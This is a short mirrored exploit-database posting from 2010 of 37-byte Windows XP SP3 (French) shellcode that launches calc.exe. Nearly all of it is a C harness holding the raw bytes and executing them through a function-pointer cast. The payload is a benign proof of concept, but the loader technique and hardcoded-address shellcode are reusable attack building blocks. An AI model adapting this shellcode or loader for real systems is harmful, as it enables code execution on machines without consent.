win32/xp sp3 (Fr) calc.exe shellcode 37 bytes
|
来源:Inj3ct0r.com 作者:antrhacks 发布时间:2010-04-28
|
|
============================================= win32/xp sp3 (Fr) calc.exe shellcode 37 bytes =============================================
/* * Title: Windows XP SP3 Fr (calc.exe) shellcode 37 bytes * Type: Shellcode * Author: antrhacks * Platform: win32 * Tested on: Windows XP SP3 Home edition Fr */
#include <stdio.h> #include <stdlib.h>
int main(){ char shellcode[] = "\xeb\x16\x5b\x50\x88\x43\x09\x53" "\xbb\x0d\x25\x86\x7c" "\xff\xd3\x31\xc0" "\xbb\x12\xcb\x81\x7c" "\xff\xd3\xe8\xe5\xff\xff\xff" "\x63\x61\x6c\x63\x2e" "\x65\x78\x65"; printf("Taille: %d \n", strlen(shellcode)); getchar(); (*(void (*)()) shellcode)(); return 0; }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|